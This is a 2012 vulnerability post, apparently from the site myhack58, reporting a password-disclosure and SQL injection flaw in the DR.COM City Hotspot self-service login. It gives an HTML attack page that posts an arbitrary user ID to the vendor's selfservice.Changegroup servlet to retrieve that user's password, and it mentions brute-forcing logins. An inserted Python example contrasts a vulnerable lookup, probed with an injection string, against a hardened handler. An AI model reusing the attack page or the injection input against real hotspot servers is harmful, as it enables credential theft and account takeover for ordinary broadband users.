DR.COM City Hotspot GetPassword 0-day vulnerability & exp - Vulnerability warning - myhack58

2012-06-22T00:00:00
ID MYHACK58:62201234163
Type myhack58
Reporter Anonymous
Modified 2012-06-22T00:00:00

Description

DR.COM City Hotspot broadband

Many places use this: cities, governments, enterprises, operators, universities and so on use this software suite to provide broadband access service.

In a recent study I found a vulnerability in the web server of the DR.COM USS user self-service login.

The password of the user with a specified ID can be viewed directly, i.e. a password disclosure vulnerability, and at the same time it can also be injected directly. It has been submitted to the vendor, with no result; I would like it repaired early to prevent attackers from illegally dumping the database.

Of course, if the login page has no CAPTCHA, it can also be brute-forced; I will not go into that here.
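The two server-side flaws described above, shown as an added example that is not from the original post or from DR.COM's code: a handler that trusts the posted Account field, next to a hardened one. The table schema, function names and session model are assumptions, and the sample rows are constructed.

```python
import sqlite3

def make_db():
    """Constructed sample data; the schema is an assumption, not DR.COM's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (account TEXT PRIMARY KEY, password TEXT, grp TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("10001", "pw-one", "basic"), ("10002", "pw-two", "basic")])
    return db

def lookup_vulnerable(db, form):
    """Flawed pattern: no session check, the posted Account is concatenated
    into the SQL text, and the stored password is returned to the caller."""
    sql = "SELECT account, password FROM users WHERE account = '" + form["Account"] + "'"
    return db.execute(sql).fetchall()

def lookup_hardened(db, session_account, form):
    """Hypothetical fixed handler: the session decides whose record is read."""
    if session_account is None:
        return {"status": 401}  # caller is not logged in
    if form.get("Account") != session_account:
        return {"status": 403}  # posted ID is not the caller's own account
    row = db.execute("SELECT account, grp FROM users WHERE account = ?",
                     (session_account,)).fetchone()  # value is bound, never spliced
    if row is None:
        return {"status": 404}
    # The password column is never selected, so it cannot leak in a response.
    return {"status": 200, "account": row[0], "group": row[1]}

if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"  # constructed injection-style input
    print(lookup_vulnerable(db, {"Account": "10002"}))           # another user's password
    print(len(lookup_vulnerable(db, {"Account": probe})))        # every row matches
    print(lookup_hardened(db, "10001", {"Account": "10002"}))    # refused
    print(lookup_hardened(db, "10001", {"Account": "10001"}))    # own record, no password
```

Storing passwords as salted hashes rather than in recoverable form would also leave nothing to disclose even if a query were reached.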

See the source code below.

The figure shows a simple page made to use it.

Source:

<html><head><title>DR.COM!&amp;hackdn-GetPassword Blackdos!</title>
</script>
<span id="theText" style="width:100%">
<h1><center><font color=#FFF8DC>DR.COM!&amp;hackdn-GetPassword Blackdos!</font></center></h1></span>
<br>
<body background="http://www.senai.br//upload/publicacoes/edu.jpg" bgcolor="#000000" text="#666666" onkeydown="onKeyDown()" oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<script language="JavaScript">
var bgOS = 0;
var bgOB = eval('document.body');
function SlBg(Saidai) {
bgOS = bgOS + 1;
if (bgOS > Saidai) bgOS = 0;
bgOB.style.backgroundPosition = "0" + bgOS;}
var ST = window.setInterval("SlBg(100)",33);
</script>
</body></html>
<center><font face="Wingdings" color="white" style="font-size: 230pt">N</font><span class="style1"><span style="font-weight: 400"><font face="Impact" color="white" style="font-size: 100pt"></font></center>
<FORM NAME="form1" method="post" ACTION="http://用户自助服务网址/servlet/selfservice.Changegroup?fid=1002" >
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr height="20">
<td align="center" bgcolor="" height="0">
</td>
</tr>
<tr style="display:none">
<td>
<!-- Hidden fields -->
</td>
</tr>
<tr>
</td>
</tr>
<td>
<table bgcolor="" width="59%" height="150" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="20%" align="center"> </td>
<td width="80%">
</td>
</tr>
<tr>
<td width="20%" align="center">&nbsp&nbsp&nbsp&nbspID:&nbsp;</td>
<td width="80%">
<input type="text" name="Account" maxlength="26" size="26">
</td>
</tr>
